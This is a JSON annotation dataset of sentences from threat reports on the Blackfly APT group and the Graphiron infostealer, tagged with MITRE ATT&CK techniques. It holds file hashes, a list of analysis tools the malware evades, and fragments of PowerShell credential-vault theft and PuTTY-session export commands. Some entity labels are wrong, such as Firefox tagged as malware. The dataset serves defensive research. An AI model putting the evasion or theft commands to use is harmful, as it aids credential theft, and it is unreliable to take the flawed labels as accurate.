"aptnotes-17_aptnotes_report-p2-s9-efc0f3", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 9, "context_before": "1/4", "sentence_text": "Mimikatz\nSHA256:\n560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a\nSHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c\nPublicly available credential-dumping tool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s10-7f7604", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 10, "context_before": "Mimikatz\nSHA256:\n560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a\nSHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c\nPublicly available credential-dumping tool.", "sentence_text": "ForkPlayground\nSHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864\nProof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s11-7308e6", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 11, "context_before": "ForkPlayground\nSHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864\nProof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.", "sentence_text": "Proxy configuration tool SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f Configures proxy settings by injecting into: C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055.012", "name": "Process Hollowing" } ], "procedure": "Tool injects into svchost.exe to configure proxy settings", "entities": [ { "text": "Proxy configuration tool", "start": 0, "end": 24, "label": "MalwareTool" }, { "text": "C:\\Windows\\system32\\svchost.exe", "start": 289, "end": 320, "label": "Infrastructure_Indicator" }, { "text": "Configures proxy settings by injecting into", "start": 244, "end": 287, "label": "Action" } ] }, { "uid": "aptnotes-17_aptnotes_report-p2-s12-612ac4", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "Proxy configuration tool SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f Configures proxy settings by injecting into: C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted.", "sentence_text": "Proxy configuration tool SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s13-4c73ff", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "Proxy configuration tool SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1", "sentence_text": "This tool requires a file called conf.dat to run properly, located at:\nc:\\users\\public\\conf.dat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s14-44ac80", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "This tool requires a file called conf.dat to run properly, located at:\nc:\\users\\public\\conf.dat.", "sentence_text": "Conf.dat contains the configuration to set up proxy settings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s15-2b485a", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "Conf.dat contains the configuration to set up proxy settings.", "sentence_text": "Longstanding APT group Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s16-8a3283", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "Longstanding APT group Blackfly is one of the longest known Chinese advanced persistent threat (APT) groups, active since at least 2010.", "sentence_text": "Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s17-a3651c", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "Early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.", "sentence_text": "Shadowpad) malware families.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s18-f1439b", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "Shadowpad) malware families.", "sentence_text": "The group initially made a name for itself through attacks on the computer gaming industry.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s19-c8a9f3", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "The group initially made a name for itself through attacks on the computer gaming industry.", "sentence_text": "Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s20-d71190", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "Blackfly has been closely associated with a second Chinese APT group known as Grayfly, so much so that some vendors track the two groups as one actor: APT41.", "sentence_text": "A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s21-c9a1bd", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 21, "context_before": "A 2020 indictment of seven men on charges relating to hundreds of cyber attacks carried out by both groups appeared to shed light on this link.", "sentence_text": "Two Chinese nationals were alleged to have worked with both groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p2-s22-cc94e5", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 2, "sentence_id": 22, "context_before": "Two Chinese nationals were alleged to have worked with both groups.", "sentence_text": "A crossover in personnel may account for the similarities between both groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s24-8bffd9", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 24, "context_before": "Undeterred\n2/4", "sentence_text": "Although it originally made a name for itself by attacking the gaming sector, the group appears focused on targeting intellectual property in a variety of sectors at present.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s25-fd3b0d", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "Although it originally made a name for itself by attacking the gaming sector, the group appears focused on targeting intellectual property in a variety of sectors at present.", "sentence_text": "Protection/Mitigation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s26-39b442", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "Protection/Mitigation", "sentence_text": "For the latest protection updates, please visit the Symantec Protection Bulletin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s27-d44903", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "For the latest protection updates, please visit the Symantec Protection Bulletin.", "sentence_text": "Indicators of Compromise If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s28-0369cd", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "Indicators of Compromise If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.", "sentence_text": "cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a –\nBackdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s29-7bb75c", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 29, "context_before": "cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a –\nBackdoor.", "sentence_text": "Winnkit\ne1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 –\nBackdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s30-77b0f3", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "Winnkit\ne1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 –\nBackdoor.", "sentence_text": "Winnkit\na3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac –\nBackdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s31-d26275", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "Winnkit\na3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac –\nBackdoor.", "sentence_text": "Winnkit\n714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 –\nBackdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s32-79573b", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "Winnkit\n714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 –\nBackdoor.", "sentence_text": "Winnkit\n192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 –\nBackdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s33-0b3f68", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 33, "context_before": "Winnkit\n192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 –\nBackdoor.", "sentence_text": "Winnkit\ncaba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 –\nBackdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p3-s34-ede39f", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 3, "sentence_id": 34, "context_before": "Winnkit\ncaba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 –\nBackdoor.", "sentence_text": "Winnkit\n452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process- hollowing tool 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool 560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – Mimikatz b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground 3/4", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-17_aptnotes_report-p4-s35-981226", "source": "aptnotes", "doc_id": "17_aptnotes_report", "page_number": 4, "sentence_id": 35, "context_before": "Winnkit\n452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process- hollowing tool 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool 560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – Mimikatz b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground 3/4", "sentence_text": "5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential- dumping tool 4/4", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s1-2c8ddb", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Graphiron: New Russian Information Stealing Malware Deployed Against Ukraine symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer Russia-linked Nodaria group has deployed a new threat designed to steal a wide range of information from infected computers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s2-35d740", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Graphiron: New Russian Information Stealing Malware Deployed Against Ukraine symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer Russia-linked Nodaria group has deployed a new threat designed to steal a wide range of information from infected computers.", "sentence_text": "The Nodaria espionage group (aka UAC-0056) is using a new piece of information stealing malware against targets in Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s3-427d5b", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "The Nodaria espionage group (aka UAC-0056) is using a new piece of information stealing malware against targets in Ukraine.", "sentence_text": "The malware (Infostealer.Graphiron) is written in Go and is designed to harvest a wide range of information from the infected computer, including system information, credentials, screenshots, and files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s4-e70013", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "The malware (Infostealer.Graphiron) is written in Go and is designed to harvest a wide range of information from the infected computer, including system information, credentials, screenshots, and files.", "sentence_text": "The earliest evidence of Graphiron dates from October 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s5-cdc328", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "The earliest evidence of Graphiron dates from October 2022.", "sentence_text": "It continued to be used until at least mid-January 2023 and it is reasonable to assume that it remains part of the Nodaria toolkit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s6-a78511", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "It continued to be used until at least mid-January 2023 and it is reasonable to assume that it remains part of the Nodaria toolkit.", "sentence_text": "Graphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s7-1e53a8", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Graphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).", "sentence_text": "The downloader contains hardcoded command-and-control (C&C) server addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s8-015bec", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "The downloader contains hardcoded command-and-control (C&C) server addresses.", "sentence_text": "When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Enumerate running processes to detect analysis tools by comparing them against a predefined blacklist.", "entities": [ { "text": "check against a blacklist of malware analysis tools", "start": 23, "end": 74, "label": "Action" }, { "text": "checking for running processes with the names listed", "start": 78, "end": 130, "label": "Action" }, { "text": "malware analysis tools", "start": 52, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-18_aptnotes_report-p1-s9-5b0079", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.", "sentence_text": "Process names\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg specific names If no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1518.001", "name": "Security Software Discovery" } ], "procedure": "Malware checks for analysis tools via process-name blacklist; if none found, it contacts C2, downloads and decrypts payload, and establishes autorun", "entities": [ { "text": " C&C server", "start": 826, "end": 837, "label": "Infrastructure_Indicator" }, { "text": "connect to a C&C server and download and decrypt the payload before adding it to autorun", "start": 814, "end": 902, "label": "Action" } ] }, { "uid": "aptnotes-18_aptnotes_report-p1-s10-a5c41b", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "Process names\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg specific names If no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.", "sentence_text": "The downloader is configured to run just once.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s11-1a800e", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "The downloader is configured to run just once.", "sentence_text": "If it fails to download and install the payload it won’t make further attempts nor send a heartbeat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s12-d6b69f", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 12, "context_before": "If it fails to download and install the payload it won’t make further attempts nor send a heartbeat.", "sentence_text": "Graphiron uses AES encryption with hardcoded keys.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s13-5850fe", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 13, "context_before": "Graphiron uses AES encryption with hardcoded keys.", "sentence_text": "It creates temporary files with the \".lock\" and \".trash\" extensions.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "Indicator Removal on Host: File Deletion" } ], "procedure": "Create temporary files with specific extensions (.lock, .trash) as part of file handling or cleanup operations.", "entities": [ { "text": "creates temporary files", "start": 3, "end": 26, "label": "Action" }, { "text": ".lock", "start": 37, "end": 42, "label": "Infrastructure_Indicator" }, { "text": ".trash", "start": 49, "end": 55, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-18_aptnotes_report-p1-s14-f1e7d6", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 14, "context_before": "It creates temporary files with the \".lock\" and \".trash\" extensions.", "sentence_text": "It uses hardcoded file names designed to masquerade as Microsoft office executables:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s15-e0f125", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 15, "context_before": "It uses hardcoded file names designed to masquerade as Microsoft office executables:", "sentence_text": "OfficeTemplate.exe and MicrosoftOfficeDashboard.exe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s16-7e387a", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 16, "context_before": "OfficeTemplate.exe and MicrosoftOfficeDashboard.exe", "sentence_text": "The payload is capable of carrying out the following tasks:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p1-s17-61786d", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 17, "context_before": "The payload is capable of carrying out the following tasks:", "sentence_text": "Reads MachineGuid\nObtains the IP address from https://checkip.amazonaws.com Retrieves the hostname, system info, and user info Steals data from Firefox and Thunderbird Steals private keys from MobaXTerm.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1016", "name": "System Network Configuration Discovery" }, { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Read MachineGuid, obtain external IP address via web request, collect host and system information, and steal credentials and data from applications such as Firefox, Thunderbird, and MobaXTerm.", "entities": [ { "text": "Reads MachineGuid", "start": 0, "end": 17, "label": "Action" }, { "text": "Obtains the IP address from https://checkip.amazonaws.com", "start": 18, "end": 75, "label": "Action" }, { "text": "Retrieves the hostname, system info, and user info", "start": 76, "end": 126, "label": "Action" }, { "text": "Steals data from Firefox and Thunderbird", "start": 127, "end": 167, "label": "Action" }, { "text": "Steals private keys from MobaXTerm", "start": 168, "end": 202, "label": "Action" }, { "text": "https://checkip.amazonaws.com", "start": 46, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "Firefox", "start": 144, "end": 151, "label": "MalwareTool" }, { "text": "Thunderbird", "start": 156, "end": 167, "label": "MalwareTool" }, { "text": "MobaXTerm", "start": 193, "end": 202, "label": "MalwareTool" } ] }, { "uid": "aptnotes-18_aptnotes_report-p1-s18-ab766c", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 1, "sentence_id": 18, "context_before": "Reads MachineGuid\nObtains the IP address from https://checkip.amazonaws.com Retrieves the hostname, system info, and user info Steals data from Firefox and Thunderbird Steals private keys from MobaXTerm.", "sentence_text": "Steals SSH known hosts Steals data from PuTTY 1/3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s19-46ab7b", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "Steals SSH known hosts Steals data from PuTTY 1/3", "sentence_text": "Steals stored passwords Takes screenshots Creates a directory Lists a directory Runs a shell command Steals an arbitrary file Password theft is carried out using the following PowerShell command:", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1113", "name": "Screen Capture" }, { "id": "T1083", "name": "File and Directory Discovery" }, { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Steal stored passwords, capture screenshots, create and list directories, execute shell commands via PowerShell, and exfiltrate arbitrary files from the local system.", "entities": [ { "text": "Steals stored passwords", "start": 0, "end": 23, "label": "Action" }, { "text": "Takes screenshots", "start": 24, "end": 41, "label": "Action" }, { "text": "Creates a directory", "start": 42, "end": 61, "label": "Action" }, { "text": "Lists a directory", "start": 62, "end": 79, "label": "Action" }, { "text": "Runs a shell command", "start": 80, "end": 100, "label": "Action" }, { "text": "Steals an arbitrary file", "start": 101, "end": 125, "label": "Action" }, { "text": "PowerShell command", "start": 176, "end": 194, "label": "MalwareTool" } ] }, { "uid": "aptnotes-18_aptnotes_report-p2-s24-74e921", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 24, "context_before": "Credentials.", "sentence_text": "PasswordVault,Windows.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s26-7319b6", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 26, "context_before": "Security.", "sentence_text": "Credentials,ContentType=WindowsRuntime];$vault\n= New-Object Windows.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s29-327686", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 29, "context_before": "Credentials.", "sentence_text": "PasswordVault;$vault.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-18_aptnotes_report-p2-s30-7fd8b3", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 30, "context_before": "PasswordVault;$vault.", "sentence_text": "The following command was used to export the list of PuTTY sessions:\n\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions Similarity to older tools Graphiron has some similarities with older Nodaria tools such as GraphSteel and GrimPlant.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1012", "name": "Query Registry" }, { "id": "T1059.003", "name": "Command and Scripting Interpreter: Windows Command Shell" } ], "procedure": "Execute reg.exe to query the Windows registry and export PuTTY session information from HKCU\\Software\\SimonTatham\\Putty\\Sessions.", "entities": [ { "text": "\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions", "start": 69, "end": 138, "label": "Action" }, { "text": "reg.exe", "start": 83, "end": 90, "label": "MalwareTool" }, { "text": "HKCU\\Software\\SimonTatham\\Putty\\Sessions", "start": 98, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "PuTTY", "start": 53, "end": 58, "label": "MalwareTool" } ] }, { "uid": "aptnotes-18_aptnotes_report-p2-s31-ec229f", "source": "aptnotes", "doc_id": "18_aptnotes_report", "page_number": 2, "sentence_id": 31, "context_before": "The following command was used to export the list of PuTTY sessions:\n\"CSIDL_SYSTEM\\reg.exe\" query 